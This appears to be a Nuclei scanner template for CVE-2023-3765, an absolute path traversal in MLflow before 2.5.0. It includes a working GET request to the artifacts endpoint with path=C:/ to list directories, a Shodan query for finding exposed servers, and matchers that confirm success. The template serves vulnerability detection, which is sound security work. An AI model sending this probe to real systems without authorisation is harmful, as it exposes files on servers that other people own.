id: CVE-2023-3765 info: name: MLflow Absolute Path Traversal author: DhiyaneshDK severity: critical description: | Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0. remediation: | Upgrade to a patched version of MLflow to mitigate the Absolute Path Traversal vulnerability. reference: - https://www.tenable.com/cve/CVE-2023-3765 - https://huntr.dev/bounties/4be5fd63-8a0a-490d-9ee1-f33dc768ed76 - https://nvd.nist.gov/vuln/detail/CVE-2023-3765 - https://github.com/mlflow/mlflow/commit/6dde93758d42455cb90ef324407919ed67668b9b classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2023-3765 cwe-id: CWE-36 epss-score: 0.00634 epss-percentile: 0.76842 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" tags: cve,cve2023,mflow,lfi,huntr http: - method: GET path: - "{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/" matchers-condition: and matchers: - type: word words: - '"is_dir":' - '"path":' - '"files":' condition: and - type: word part: header words: - application/json - type: status status: - 200 # digest: 4a0a00473045022100cac54115e7fc305be16aa8a500015b1a2573313e6907f0f25672e19d8155772102204cd1d31328f18fb0dc1f64194b99556ae8de1caea937f1dbb4734b17ddfad1a5:922c64590222798bb761d5b6d8e72950